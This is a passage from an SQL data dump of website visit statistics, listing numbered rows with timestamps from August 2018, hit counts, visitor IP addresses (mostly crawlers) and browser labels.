,(282122,1533350466,1,1,0,0,'54.36.148.65','other'),(282123,1533350519,1,1,0,0,'54.36.149.58','other'),(282124,1533350554,1,1,0,0,'54.36.148.57','other'),(282125,1533350861,1,1,0,0,'216.244.66.241','other'),(282126,1533351233,1,0,1,0,'66.249.64.67',''),(282127,1533351772,1,1,0,0,'54.36.148.136','other'),(282128,1533351869,1,1,0,0,'54.36.148.252','other'),(282129,1533352556,1,1,0,0,'185.220.101.25','other'),(282130,1533352576,1,1,0,0,'54.36.149.92','other'),(282131,1533352978,1,1,0,0,'216.244.66.241','other'),(282132,1533353626,1,1,0,0,'54.36.148.213','other'),(282133,1533353723,1,1,0,0,'54.36.148.219','other'),(282134,1533353825,1,1,0,0,'8.29.198.25','other'),(282135,1533354227,1,1,0,0,'54.36.149.42','other'),(282136,1533354410,1,1,0,0,'54.36.148.190','other'),(282137,1533354433,1,1,0,0,'54.36.148.251','other'),(282138,1533354532,1,1,0,0,'54.36.148.124','other'),(282139,1533354563,1,1,0,0,'207.46.13.39','other'),(282140,1533355012,1,1,0,0,'54.36.148.112','other'),(282141,1533355178,1,1,0,0,'54.36.149.92','other'),(282142,1533355409,1,1,0,0,'8.29.198.25','other'),(282143,1533355530,1,1,0,0,'54.36.148.66','other'),(282144,1533355615,5,5,0,0,'216.244.66.241','other'),(282145,1533355679,1,1,0,0,'54.36.148.89','other'),(282146,1533355684,1,1,0,0,'54.36.148.253','other'),(282147,1533355690,1,1,0,0,'54.36.148.237','other'),(282148,1533356409,1,1,0,0,'13.66.185.4','other'),(282149,1533356458,1,0,1,0,'66.249.64.217',''),(282150,1533357134,1,1,0,0,'54.36.148.192','other'),(282151,1533357175,1,1,0,0,'54.36.148.46','other'),(282152,1533357302,1,1,0,0,'54.36.148.159','other'),(282153,1533357313,2,2,0,0,'54.36.148.100','other'),(282154,1533357317,3,3,0,0,'173.208.206.50','other'),(282155,1533357462,1,1,0,0,'54.36.149.75','other'),(282156,1533357819,1,1,0,0,'87.250.224.46','other'),(282157,1533358202,1,1,0,0,'54.36.149.31','other'),(282158,1533358208,1,1,0,0,'54.36.148.38','other'),(282159,1533358304,1,1,0,0,'54.36.149.37','other'),(282160,1533358603,1,1,0,0,'54.36.148.209','other'),(282161,1533358606,2,2,0,0,'141.8.142.74','other'),(282162,1533358844,1,1,0,0,'54.36.149.11','other'),(282163,1533359311,1,1,0,0,'54.36.149.59','other'),(282164,1533359322,1,1,0,0,'54.36.149.87','other'),(282165,1533359518,1,1,0,0,'54.36.149.90','other'),(282166,1533359553,1,1,0,0,'54.36.148.61','other'),(282167,1533359717,1,1,0,0,'185.220.101.46','other'),(282168,1533359894,1,1,0,0,'54.36.148.25','other'),(282169,1533359919,1,1,0,0,'54.36.149.69','other'),(282170,1533359952,1,1,0,0,'54.36.148.142','other'),(282171,1533359953,1,1,0,0,'54.36.148.238','other'),(282172,1533360045,2,2,0,0,'216.244.66.241','other'),(282173,1533360064,1,1,0,0,'54.36.149.55','other'),(282174,1533360198,1,1,0,0,'54.36.148.73','other'),(282175,1533360425,1,1,0,0,'54.36.148.233','other'),(282176,1533360572,1,1,0,0,'178.154.171.88','other'),(282177,1533360715,1,1,0,0,'207.46.13.38','other'),(282178,1533360962,1,1,0,0,'54.36.148.237','other'),(282179,1533361041,1,1,0,0,'54.36.148.239','other'),(282180,1533361122,3,3,0,0,'216.244.66.241','other'),(282181,1533361271,1,1,0,0,'54.36.148.151','other'),(282182,1533361549,1,1,0,0,'54.36.148.219','other'),(282183,1533361572,1,1,0,0,'95.163.255.190','other'),(282184,1533361641,1,1,0,0,'54.36.148.244','other'),(282185,1533361697,1,1,0,0,'141.8.142.74','other'),(282186,1533361741,1,1,0,0,'54.36.148.154','other'),(282187,1533361901,1,1,0,0,'54.36.148.110','other'),(282188,1533361903,1,0,1,0,'66.249.64.73',''),(282189,1533361966,1,1,0,0,'54.36.149.31','other'),(282190,1533362260,1,1,0,0,'54.36.148.126','other'),(282191,1533362285,1,1,0,0,'54.36.148.195','other'),(282192,1533362516,1,1,0,0,'54.36.148.97','other'),(282193,1533362613,2,2,0,0,'91.196.178.174','chrome'),(282194,1533362798,1,1,0,0,'54.36.148.121','other'),(282195,1533362970,1,1,0,0,'54.36.148.65','other'),(282196,1533363107,1,1,0,0,'54.36.148.181','other'),(282197,1533363340,1,1,0,0,'51.15.57.167','other'),(282198,1533363432,1,1,0,0,'54.36.148.90','other'),(282199,1533363461,8,8,0,0,'216.244.66.241','other'),(282200,1533363518,1,1,0,0,'54.36.148.11','other'),(282201,1533363653,1,1,0,0,'54.36.148.71','other'),(282202,1533363707,1,1,0,0,'54.36.149.53','other'),(282203,1533363852,1,1,0,0,'54.36.148.14','other'),(282204,1533364063,1,1,0,0,'178.154.171.88','other'),(282205,1533364182,1,1,0,0,'207.46.13.39','other'),(282206,1533364187,1,1,0,0,'54.36.148.186','other'),(282207,1533364284,1,1,0,0,'54.36.148.26','other'),(282208,1533364476,1,1,0,0,'54.36.148.200','other'),(282209,1533364675,1,1,0,0,'8.29.198.26','other'),(282210,1533365017,1,1,0,0,'54.36.148.230','other'),(282211,1533365213,1,1,0,0,'95.163.255.94','other'),(282212,1533365546,1,1,0,0,'54.36.148.225','other'),(282213,1533365559,1,1,0,0,'54.36.148.24','other'),(282214,1533365571,1,1,0,0,'54.36.149.103','other'),(282215,1533365578,1,1,0,0,'54.36.148.109','other'),(282217,1533365675,1,1,0,0,'54.36.149.37','other'),(282218,1533365968,1,1,0,0,'54.36.148.242','other'),(282219,1533366045,1,1,0,0,'54.36.148.115','other'),(282220,1533366262,1,1,0,0,'8.29.198.25','other'),(282221,1533366313,1,1,0,0,'54.36.148.183','other'),(282222,1533366376,1,1,0,0,'54.36.148.231','other'),(282223,1533366532,1,1,0,0,'54.36.148.215','other'),(282224,1533366590,1,1,0,0,'54.36.149.77','other'),(282225,1533366596,1,1,0,0,'54.36.149.13','other'),(282226,1533366627,1,1,0,0,'54.36.148.205','other'),(282227,1533366718,1,1,0,0,'54.36.148.48','other'),(282228,1533366914,1,1,0,0,'216.244.66.241','other'),(282229,1533366944,1,1,0,0,'185.220.102.8','other'),(282230,1533367212,1,1,0,0,'54.36.149.32','other'),(282231,1533367541,1,1,0,0,'54.36.149.54','other'),(282232,1533367764,1,1,0,0,'54.36.148.15','other'),(282233,1533367803,1,1,0,0,'5.188.211.26','msie'),(282234,1533367938,2,2,0,0,'216.244.66.241','other'),(282235,1533368100,1,1,0,0,'54.36.149.36','other'),(282236,1533368136,1,1,0,0,'54.36.148.246','other'),(282237,1533368755,1,1,0,0,'54.36.148.19','other'),(282238,1533368922,1,1,0,0,'178.154.171.88','other'),(282239,1533369068,1,1,0,0,'141.8.142.74','other'),(282240,1533369274,1,1,0,0,'54.36.148.218','other'),(282241,1533369282,1,1,0,0,'54.36.149.11','other'),(282242,1533369338,1,1,0,0,'216.244.66.241','other'),(282243,1533369356,1,1,0,0,'54.36.149.106','other'),(282244,1533369448,1,1,0,0,'54.36.148.97','other'),(282245,1533369678,1,1,0,0,'54.36.148.193','other'),(282246,1533369718,1,1,0,0,'54.36.148.33','other'),(282247,1533370046,1,1,0,0,'54.36.149.58','other'),(282248,1533370388,1,1,0,0,'54.36.149.72','other'),(282249,1533370520,1,1,0,0,'95.130.12.33','other'),(282250,1533370731,1,1,0,0,'54.36.149.76','other'),(282251,1533370742,1,1,0,0,'54.36.149.42','other'),(282252,1533370744,1,1,0,0,'54.36.149.26','other'),(282253,1533370797,1,1,0,0,'54.36.148.59','other'),(282254,1533370892,1,1,0,0,'54.36.148.54','other'),(282255,1533370913,1,1,0,0,'54.36.148.75','other'),(282256,1533371102,1,1,0,0,'54.36.148.58','other'),(282257,1533371137,1,1,0,0,'54.36.148.25','other'),(282258,1533371232,1,1,0,0,'54.36.148.95','other'),(282259,1533371268,1,1,0,0,'54.36.149.94','other'),(282260,1533371364,2,2,0,0,'216.244.66.241','other'),(282261,1533371586,1,1,0,0,'54.36.148.165','other'),(282262,1533371595,1,1,0,0,'141.8.142.74','other'),(282263,1533371804,1,1,0,0,'54.36.148.105','other'),(282264,1533371815,1,1,0,0,'178.154.171.88','other'),(282265,1533371819,1,1,0,0,'54.36.148.119','other'),(282266,1533372103,1,1,0,0,'54.36.148.168','other'),(282267,1533372532,1,1,0,0,'54.36.149.33','other'),(282268,1533372540,1,1,0,0,'207.46.13.36','other'),(282269,1533372609,1,1,0,0,'54.36.148.37','other'),(282270,1533372615,1,1,0,0,'54.36.148.189','other'),(282271,1533372656,1,1,0,0,'199.58.86.211','other'),(282272,1533372664,1,1,0,0,'54.36.148.244','other'),(282273,1533372859,1,1,0,0,'54.36.148.107','other'),(282274,1533372919,1,1,0,0,'54.36.148.202','other'),(282275,1533372955,1,1,0,0,'54.36.148.192','other'),(282276,1533372967,1,1,0,0,'54.36.148.220','other'),(282277,1533372977,1,1,0,0,'54.36.148.221','other'),(282278,1533373107,1,1,0,0,'216.244.66.241','other'),(282279,1533373154,1,1,0,0,'54.36.149.57','other'),(282280,1533373688,1,1,0,0,'54.36.148.236','other'),(282281,1533373940,1,1,0,0,'54.36.148.222','other'),(282282,1533374127,1,1,0,0,'176.126.252.12','other'),(282283,1533374159,1,1,0,0,'54.36.148.71','other'),(282284,1533374552,1,1,0,0,'54.36.149.20','other'),(282285,1533374565,1,1,0,0,'54.36.148.190','other'),(282286,1533374579,1,1,0,0,'54.36.148.174','other'),(282287,1533374611,1,1,0,0,'54.36.149.58','other'),(282288,1533374719,1,1,0,0,'91.196.178.131','firefox'),(282289,1533374721,1,1,0,0,'216.244.66.241','other'),(282290,1533375108,2,2,0,0,'5.9.100.40','other'),(282291,1533375171,1,1,0,0,'54.36.148.87','other'),(282292,1533375524,1,1,0,0,'8.29.198.25','other'),(282293,1533375528,1,1,0,0,'54.36.148.104','other'),(282294,1533375918,1,1,0,0,'54.36.148.24','other'),(282295,1533376074,1,1,0,0,'54.36.148.52','other'),(282296,1533376365,1,1,0,0,'54.36.149.32','other'),(282297,1533376578,1,1,0,0,'54.36.148.152','other'),(282298,1533376591,1,1,0,0,'54.36.148.147','other'),(282299,1533376607,1,1,0,0,'54.36.148.236','other'),(282300,1533376657,1,1,0,0,'141.8.142.74','other'),(282301,1533376794,1,1,0,0,'54.36.148.212','other'),(282302,1533376820,6,6,0,0,'216.244.66.241','other'),(282303,1533376922,1,1,0,0,'54.36.148.67','other'),(282304,1533377112,1,1,0,0,'8.29.198.25','other'),(282305,1533377131,1,1,0,0,'54.36.148.140','other'),(282306,1533377606,1,1,0,0,'54.36.149.40','other'),(282307,1533377663,1,1,0,0,'178.154.171.88','other'),(282308,1533377749,1,1,0,0,'178.17.170.196','other'),(282309,1533377834,1,1,0,0,'54.36.148.69','other'),(282310,1533377883,1,1,0,0,'199.58.86.206','other'),(282311,1533378092,1,1,0,0,'54.36.148.233','other'),(282312,1533378173,1,1,0,0,'54.36.149.107','other'),(282313,1533378290,1,1,0,0,'54.36.148.224','other'),(282314,1533378420,1,1,0,0,'141.8.142.74','other'),(282315,1533378690,1,1,0,0,'87.250.224.46','other'),(282316,1533378856,2,2,0,0,'54.36.148.105','other'),(282317,1533378885,1,1,0,0,'54.36.148.195','other'),(282318,1533378946,1,1,0,0,'54.36.148.18','other'),(282319,1533379098,1,1,0,0,'54.36.148.22','other'),(282320,1533379343,1,1,0,0,'141.8.142.74','other'),(282321,1533379362,6,6,0,0,'216.244.66.241','other'),(282322,1533379602,1,1,0,0,'54.36.149.48','other'),(282323,1533379680,1,1,0,0,'54.36.148.26','other'),(282324,1533379714,1,1,0,0,'54.36.149.25','other'),(282325,1533380230,1,1,0,0,'54.36.148.172','other'),(282326,1533380757,1,1,0,0,'54.36.149.46','other'),(282327,1533381080,1,1,0,0,'54.36.148.244','other'),(282328,1533381152,1,1,0,0,'54.36.148.173','other'),(282329,1533381180,1,1,0,0,'54.36.148.36','other'),(282330,1533381225,1,1,0,0,'54.36.148.143','other'),(282331,1533381293,1,1,0,0,'54.36.148.100','other'),(282332,1533381297,1,1,0,0,'54.36.149.56','other'),(282333,1533381445,1,1,0,0,'54.36.148.142','other'),(282334,1533381532,1,1,0,0,'81.209.177.189','other'),(282335,1533381843,2,2,0,0,'216.244.66.241','other'),(282336,1533382136,1,1,0,0,'54.36.148.148','other'),(282337,1533382458,1,1,0,0,'54.36.149.71','other'),(282338,1533382638,1,1,0,0,'54.36.148.42','other'),(282339,1533382796,1,1,0,0,'54.36.148.179','other'),(282340,1533382944,1,1,0,0,'87.250.224.46','other'),(282341,1533383110,1,1,0,0,'37.73.246.134','chrome'),(282342,1533383219,1,1,0,0,'54.36.148.147','other'),(282343,1533383315,1,1,0,0,'54.36.148.99','other'),(282344,1533383522,1,1,0,0,'54.36.148.231','other'),(282345,1533383616,1,1,0,0,'54.36.148.22','other'),(282346,1533383917,1,1,0,0,'54.36.149.49','other'),(282347,1533384126,1,1,0,0,'92.113.189.235','chrome'),(282348,1533384162,1,1,0,0,'54.36.149.77','other'),(282349,1533384202,1,0,1,0,'66.249.64.73',''),(282350,1533384288,1,1,0,0,'178.154.171.88','other'),(282351,1533384381,2,2,0,0,'141.8.142.74','other'),(282352,1533384523,1,1,0,0,'54.36.149.71','other'),(282353,1533384767,1,1,0,0,'216.244.66.241','other'),(282354,1533385012,1,0,1,0,'66.249.64.71',''),(282355,1533385147,1,1,0,0,'207.46.13.38','other'),(282356,1533385757,1,1,0,0,'54.36.148.19','other'),(282357,1533385801,1,1,0,0,'54.36.148.250','other'),(282358,1533385840,1,1,0,0,'54.36.148.151','other'),(282359,1533386386,1,1,0,0,'8.29.198.26','other'),(282360,1533386843,1,1,0,0,'54.36.148.227','other'),(282361,1533386925,1,1,0,0,'54.36.149.41','other'),(282362,1533386951,2,2,0,0,'141.8.142.74','other'),(282363,1533387003,1,1,0,0,'54.36.148.184','other'),(282364,1533387289,1,1,0,0,'54.36.149.92','other'),(282365,1533387446,1,1,0,0,'54.36.148.186','other'),(282366,1533387521,1,1,0,0,'54.36.148.98','other'),(282367,1533387764,1,1,0,0,'178.154.171.88','other'),(282368,1533387775,1,1,0,0,'54.36.149.65','other'),(282369,1533387800,1,1,0,0,'54.36.148.120','other'),(282370,1533387868,1,1,0,0,'141.8.142.74','other'),(282371,1533387954,1,1,0,0,'8.29.198.26','other'),(282372,1533388096,1,1,0,0,'207.46.13.39','other'),(282373,1533388314,1,1,0,0,'54.36.148.81','other'),(282374,1533388535,1,1,0,0,'164.132.51.91','other'),(282375,1533388748,1,0,1,0,'66.249.64.67',''),(282376,1533388816,1,1,0,0,'54.36.148.82','other'),(282377,1533388998,1,1,0,0,'91.209.11.236','other'),(282378,1533389103,1,1,0,0,'141.8.132.22','other'),(282379,1533389164,1,1,0,0,'54.36.148.168','other'),(282380,1533389633,1,1,0,0,'54.36.149.22','other'),(282381,1533389728,1,1,0,0,'54.36.148.114','other'),(282382,1533389895,2,2,0,0,'54.36.148.130','other'),(282383,1533390065,1,1,0,0,'178.154.171.88','other'),(282384,1533390273,1,1,0,0,'54.36.149.9','other'),(282385,1533390347,2,2,0,0,'141.8.142.74','other'),(282386,1533390705,1,1,0,0,'54.36.148.97','other'),(282387,1533390791,1,1,0,0,'54.36.148.95','other'),(282388,1533390968,1,1,0,0,'207.46.13.39','other'),(282389,1533391296,1,1,0,0,'141.8.142.74','other'),(282390,1533391636,1,1,0,0,'54.36.148.112','other'),(282391,1533391754,1,1,0,0,'132.185.161.125','chrome'),(282392,1533392000,1,1,0,0,'54.36.148.163','other'),(282393,1533392134,1,1,0,0,'77.247.181.165','other'),(282394,1533392337,1,1,0,0,'91.209.11.236','other'),(282395,1533392471,1,1,0,0,'54.36.149.102','other'),(282396,1533392535,1,1,0,0,'157.55.39.210','other'),(282397,1533392671,1,1,0,0,'54.36.148.78','other'),(282398,1533392777,1,0,1,0,'66.249.64.219',''),(282399,1533392802,1,1,0,0,'54.36.149.48','other'),(282400,1533392930,1,1,0,0,'54.36.149.19','other'),(282401,1533393045,1,1,0,0,'134.249.50.5','chrome'),(282402,1533393126,2,2,0,0,'141.8.142.74','other'),(282403,1533393196,1,1,0,0,'54.36.148.17','other'),(282404,1533393276,1,1,0,0,'54.36.149.34','other'),(282405,1533393368,1,1,0,0,'54.36.148.208','other'),(282406,1533393482,1,0,1,0,'66.249.64.67',''),(282407,1533393795,1,1,0,0,'54.36.148.192','other'),(282408,1533393816,1,1,0,0,'54.36.149.8','other'),(282409,1533394085,1,1,0,0,'54.36.149.24','other'),(282410,1533394203,1,1,0,0,'54.36.148.24','other'),(282411,1533394267,1,1,0,0,'54.36.149.51','other'),(282412,1533394291,1,1,0,0,'91.196.178.184','chrome'),(282413,1533394604,1,1,0,0,'87.250.224.46','other'),(282414,1533394762,1,1,0,0,'54.36.148.184','other'),(282415,1533394774,1,1,0,0,'54.36.148.86','other'),(282416,1533394949,4,4,0,0,'216.244.66.241','other'),(282417,1533395020,1,1,0,0,'141.8.142.74','other'),(282418,1533395186,1,1,0,0,'66.249.64.67','chrome'),(282419,1533395195,1,1,0,0,'54.36.148.83','other'),(282420,1533395231,1,1,0,0,'54.36.148.233','other'),(282421,1533395361,1,1,0,0,'54.36.148.67','other'),(282422,1533395478,1,1,0,0,'54.36.148.193','other'),(282423,1533395748,1,1,0,0,'51.15.233.253','other'),(282424,1533396197,1,1,0,0,'54.36.148.223','other'),(282425,1533396484,1,1,0,0,'141.8.142.74','other'),(282426,1533396906,1,1,0,0,'207.46.13.36','other'),(282427,1533397014,1,1,0,0,'54.36.149.48','other'),(282428,1533397236,1,1,0,0,'8.29.198.25','other'),(282429,1533397458,1,1,0,0,'141.8.142.74','other'),(282430,1533397607,1,1,0,0,'54.36.148.21','other'),(282431,1533397750,1,1,0,0,'54.36.148.149','other'),(282432,1533397821,1,1,0,0,'54.36.148.91','other'),(282433,1533397894,1,1,0,0,'54.36.148.147','other'),(282434,1533398031,1,1,0,0,'54.36.148.144','other'),(282435,1533398042,1,1,0,0,'37.139.178.28','chrome'),(282436,1533398578,1,1,0,0,'95.163.255.107','other'),(282437,1533398587,1,1,0,0,'95.163.255.114','other'),(282438,1533398815,1,1,0,0,'54.36.148.14','other'),(282439,1533398816,1,1,0,0,'8.29.198.27','other'),(282440,1533399197,1,1,0,0,'54.36.148.235','other'),(282441,1533399337,1,1,0,0,'185.220.101.9','other'),(282442,1533399383,1,1,0,0,'54.36.148.115','other'),(282443,1533399512,1,0,1,0,'66.249.64.67',''),(282444,1533399551,1,1,0,0,'87.250.224.46','other'),(282445,1533399598,1,1,0,0,'54.36.149.17','other'),(282446,1533399698,1,1,0,0,'54.36.148.225','other'),(282447,1533399863,1,1,0,0,'54.36.148.153','other'),(282448,1533399932,1,1,0,0,'141.8.142.74','other'),(282449,1533400000,1,1,0,0,'54.36.149.92','other'),(282450,1533400052,1,1,0,0,'54.36.148.175','other'),(282451,1533400158,1,1,0,0,'54.36.148.195','other'),(282452,1533400265,2,0,2,0,'66.249.64.73',''),(282453,1533400459,1,1,0,0,'54.36.148.33','other'),(282454,1533400614,1,1,0,0,'95.163.255.176','other'),(282455,1533400710,1,1,0,0,'216.244.66.241','other'),(282456,1533400894,1,1,0,0,'157.55.39.210','other'),(282457,1533400900,1,1,0,0,'54.36.149.74','other'),(282458,1533401055,1,0,1,0,'66.249.64.67',''),(282459,1533401110,1,1,0,0,'141.8.132.19','other'),(282460,1533401200,1,1,0,0,'185.217.68.199','chrome'),(282461,1533401220,1,1,0,0,'54.36.149.24','other'),(282462,1533401354,1,1,0,0,'54.36.148.217','other'),(282463,1533401402,1,1,0,0,'141.8.142.74','other'),(282464,1533401404,1,1,0,0,'178.154.171.88','other'),(282465,1533401656,1,0,1,0,'66.249.64.221',''),(282466,1533401691,1,0,1,0,'66.249.64.219',''),(282467,1533401800,1,1,0,0,'54.36.149.94','other'),(282468,1533401874,1,1,0,0,'54.36.148.17','other'),(282469,1533402046,2,2,0,0,'157.55.39.210','other'),(282470,1533402316,1,1,0,0,'54.36.148.227','other'),(282471,1533402318,1,1,0,0,'54.36.148.39','other'),(282472,1533402411,1,1,0,0,'54.36.148.74','other'),(282473,1533402704,1,1,0,0,'54.36.148.201','other'),(282474,1533402775,1,0,1,0,'66.249.64.71',''),(282475,1533402831,1,1,0,0,'91.250.36.64','chrome'),(282476,1533402952,1,1,0,0,'54.36.149.48','other'),(282477,1533402970,1,1,0,0,'185.220.101.45','other'),(282478,1533403065,1,1,0,0,'54.36.148.130','other'),(282479,1533403178,1,1,0,0,'216.244.66.241','other'),(282480,1533403498,1,1,0,0,'185.217.68.199','chrome'),(282481,1533403827,1,0,1,0,'66.249.64.71',''),(282482,1533404160,1,1,0,0,'54.36.148.43','other'),(282483,1533404215,1,1,0,0,'54.36.148.224','other'),(282484,1533404398,1,1,0,0,'54.36.148.126','other'),(282485,1533404935,1,1,0,0,'66.249.64.67','chrome'),(282486,1533405283,2,2,0,0,'216.244.66.241','other'),(282487,1533405697,1,1,0,0,'95.163.255.99','other'),(282488,1533405698,1,1,0,0,'54.36.148.79','other'),(282489,1533405758,1,1,0,0,'54.36.148.136','other'),(282490,1533405961,1,1,0,0,'95.163.255.189','other'),(282491,1533405986,1,1,0,0,'54.36.148.47','other'),(282492,1533406013,1,1,0,0,'54.36.149.3','other'),(282493,1533406162,1,0,1,0,'66.249.64.219',''),(282494,1533406274,1,1,0,0,'54.36.148.194','other'),(282495,1533406406,1,1,0,0,'54.36.148.59','other'),(282496,1533406447,1,1,0,0,'141.8.142.74','other'),(282497,1533406483,2,2,0,0,'178.154.171.88','other'),(282498,1533406512,1,1,0,0,'54.36.148.12','other'),(282499,1533407090,1,1,0,0,'54.36.148.69','other'),(282500,1533407184,1,1,0,0,'54.36.149.8','other'),(282501,1533407314,1,1,0,0,'54.36.148.133','other'),(282502,1533407381,1,1,0,0,'54.36.148.15','other'),(282503,1533407482,1,1,0,0,'141.8.142.74','other'),(282504,1533407483,1,1,0,0,'54.36.149.65','other'),(282505,1533407520,1,1,0,0,'54.36.148.76','other'),(282506,1533407582,1,1,0,0,'54.36.148.65','other'),(282507,1533407969,1,1,0,0,'54.36.149.84','other'),(282508,1533408093,1,1,0,0,'8.29.198.26','other'),(282509,1533408222,1,1,0,0,'54.36.149.56','other'),(282510,1533408258,1,1,0,0,'216.244.66.241','other'),(282511,1533408552,1,1,0,0,'54.36.149.6','other'),(282512,1533408681,1,1,0,0,'54.36.148.121','other'),(282513,1533408752,1,1,0,0,'54.36.148.150','other'),(282514,1533408800,1,1,0,0,'194.187.170.136','other'),(282515,1533408979,1,1,0,0,'54.36.148.156','other'),(282516,1533409127,1,1,0,0,'54.36.149.16','other'),(282517,1533409133,1,1,0,0,'54.36.148.173','other'),(282518,1533409475,1,1,0,0,'54.36.148.225','other'),(282519,1533409500,1,1,0,0,'91.196.178.33','chrome'),(282520,1533409667,1,1,0,0,'8.29.198.25','other'),(282521,1533409680,1,1,0,0,'54.36.148.11','other'),(282522,1533409706,1,1,0,0,'207.46.13.36','other'),(282523,1533409920,1,1,0,0,'141.8.142.74','other'),(282524,1533409947,1,1,0,0,'66.249.64.73','chrome'),(282525,1533410093,1,1,0,0,'54.36.148.113','other'),(282526,1533410150,1,1,0,0,'95.216.15.180','other'),(282527,1533410170,1,1,0,0,'54.36.148.151','other'),(282528,1533410235,1,1,0,0,'54.36.148.128','other'),(282529,1533410461,1,1,0,0,'54.36.148.97','other'),(282530,1533410477,1,1,0,0,'54.36.148.212','other'),(282531,1533410529,1,1,0,0,'95.163.255.99','other'),(282532,1533410631,1,1,0,0,'54.36.148.231','other'),(282533,1533410699,1,1,0,0,'54.36.149.63','other'),(282534,1533410964,1,1,0,0,'54.36.148.79','other'),(282535,1533411086,1,1,0,0,'54.36.148.84','other'),(282536,1533411120,3,3,0,0,'216.244.66.241','other'),(282537,1533411383,1,1,0,0,'178.154.171.88','other'),(282538,1533411646,1,1,0,0,'54.36.148.31','other'),(282539,1533411718,1,1,0,0,'54.36.148.242','other'),(282540,1533411796,1,1,0,0,'141.8.142.74','other'),(282541,1533412178,1,1,0,0,'54.36.148.92','other'),(282542,1533412683,1,1,0,0,'178.154.171.88','other'),(282543,1533413112,1,1,0,0,'54.36.148.147','other'),(282544,1533413176,1,1,0,0,'54.36.149.73','other'),(282545,1533413399,1,1,0,0,'54.36.148.81','other'),(282546,1533413447,1,1,0,0,'54.36.148.109','other'),(282547,1533413467,1,1,0,0,'141.8.142.74','other'),(282548,1533413492,1,1,0,0,'54.36.148.110','other'),(282549,1533413662,3,3,0,0,'216.244.66.241','other'),(282550,1533413737,1,1,0,0,'87.233.197.114','other'),(282551,1533413860,1,1,0,0,'54.36.148.225','other'),(282552,1533413968,1,1,0,0,'54.36.148.229','other'),(282553,1533414179,1,1,0,0,'178.154.171.88','other'),(282554,1533414373,1,1,0,0,'54.36.148.69','other'),(282555,1533414781,1,1,0,0,'54.36.149.27','other'),(282556,1533414826,1,1,0,0,'157.55.13.64','other'),(282557,1533414947,1,0,1,0,'66.249.64.67',''),(282558,1533414995,1,1,0,0,'54.36.149.53','other'),(282559,1533415118,1,1,0,0,'178.154.171.88','other'),(282560,1533415332,1,1,0,0,'54.36.149.61','other'),(282561,1533415544,1,1,0,0,'52.53.201.78','chrome'),(282562,1533415655,2,2,0,0,'141.8.142.74','other'),(282563,1533415726,3,3,0,0,'46.211.40.213','chrome'),(282564,1533415753,1,1,0,0,'54.36.148.153','other'),(282565,1533415858,1,1,0,0,'54.36.148.71','other'),(282566,1533415976,1,1,0,0,'54.36.148.140','other'),(282567,1533416345,1,1,0,0,'54.36.149.79','other'),(282568,1533416375,1,1,0,0,'216.244.66.241','other'),(282569,1533416422,1,1,0,0,'54.36.149.73','other'),(282570,1533416784,1,1,0,0,'54.36.148.15','other'),(282571,1533416808,1,1,0,0,'54.36.149.67','other'),(282572,1533416877,2,2,0,0,'54.36.149.53','other'),(282573,1533416925,1,1,0,0,'54.36.148.103','other'),(282574,1533417105,1,1,0,0,'54.36.148.65','other'),(282575,1533417316,1,1,0,0,'54.36.148.59','other'),(282576,1533417355,1,1,0,0,'185.220.101.25','other'),(282577,1533417489,1,1,0,0,'54.36.148.248','other'),(282578,1533417675,1,1,0,0,'54.36.148.16','other'),(282579,1533417872,1,1,0,0,'54.36.148.102','other'),(282580,1533417988,1,1,0,0,'54.36.148.224','other'),(282581,1533418472,1,1,0,0,'95.163.255.194','other'),(282582,1533418536,1,1,0,0,'54.36.149.82','other'),(282583,1533418933,1,1,0,0,'54.36.148.219','other'),(282584,1533418938,1,1,0,0,'8.29.198.26','other'),(282585,1533418941,1,1,0,0,'216.244.66.241','other'),(282586,1533419240,1,1,0,0,'37.55.57.95','chrome'),(282587,1533419336,1,1,0,0,'54.36.148.132','other'),(282588,1533419497,1,1,0,0,'54.36.148.131','other'),(282589,1533419524,1,1,0,0,'141.8.142.74','other'),(282590,1533419856,1,1,0,0,'178.154.171.88','other'),(282591,1533419862,1,1,0,0,'157.55.39.190','other'),(282592,1533420016,1,1,0,0,'54.36.148.95','other'),(282593,1533420061,1,1,0,0,'54.36.149.39','other'),(282594,1533420379,1,1,0,0,'54.36.148.141','other'),(282595,1533420419,1,1,0,0,'191.103.241.37','chrome'),(282596,1533420448,1,1,0,0,'54.36.148.83','other'),(282597,1533420512,1,1,0,0,'8.29.198.25','other'),(282598,1533420516,1,1,0,0,'66.249.64.71','chrome'),(282599,1533420929,1,1,0,0,'185.220.101.28','other'),(282600,1533421036,1,1,0,0,'54.36.148.88','other'),(282601,1533421451,1,1,0,0,'54.36.148.195','other'),(282602,1533421718,1,0,1,0,'66.249.64.73',''),(282603,1533421850,2,2,0,0,'216.244.66.241','other'),(282604,1533421928,1,1,0,0,'87.250.224.46','other'),(282605,1533421956,1,1,0,0,'54.36.148.111','other'),(282606,1533422188,1,1,0,0,'5.188.211.26','msie'),(282607,1533422382,2,2,0,0,'141.8.142.74','other'),(282608,1533422595,1,0,1,0,'66.249.64.71',''),(282609,1533422951,1,1,0,0,'54.36.148.102','other'),(282610,1533423338,1,1,0,0,'54.36.148.21','other'),(282611,1533423528,1,1,0,0,'54.36.148.188','other'),(282612,1533423658,1,1,0,0,'54.36.148.173','other'),(282613,1533423817,1,1,0,0,'54.36.148.131','other'),(282614,1533423878,1,1,0,0,'216.244.66.241','other'),(282615,1533424060,1,1,0,0,'54.36.148.236','other'),(282616,1533424082,1,1,0,0,'54.36.148.191','other'),(282617,1533424109,1,1,0,0,'54.36.148.249','other'),(282618,1533424335,1,1,0,0,'178.154.171.88','other'),(282619,1533424534,1,1,0,0,'78.109.23.1','other'),(282620,1533424689,1,1,0,0,'54.36.148.237','other'),(282621,1533424848,1,1,0,0,'54.36.148.233','other'),(282622,1533424851,1,1,0,0,'54.36.148.166','other'),(282623,1533424951,1,1,0,0,'54.36.149.94','other'),(282624,1533425140,1,1,0,0,'54.36.148.95','other'),(282625,1533425167,1,1,0,0,'54.36.149.92','other'),(282626,1533425183,1,1,0,0,'207.46.13.36','other'),(282627,1533425778,1,1,0,0,'54.36.149.33','other'),(282628,1533425953,1,1,0,0,'54.36.148.136','other'),(282629,1533425989,1,1,0,0,'37.9.113.157','other'),(282630,1533426015,1,1,0,0,'54.36.149.7','other'),(282631,1533426103,1,1,0,0,'54.36.148.60','other'),(282632,1533426126,1,1,0,0,'54.36.148.64','other'),(282633,1533426515,1,1,0,0,'54.36.148.69','other'),(282634,1533426672,1,1,0,0,'54.36.148.234','other'),(282635,1533426770,1,1,0,0,'54.36.148.110','other'),(282636,1533426790,1,1,0,0,'54.36.148.71','other'),(282637,1533426885,1,1,0,0,'216.244.66.241','other'),(282638,1533427219,1,1,0,0,'54.36.149.58','other'),(282639,1533427366,1,1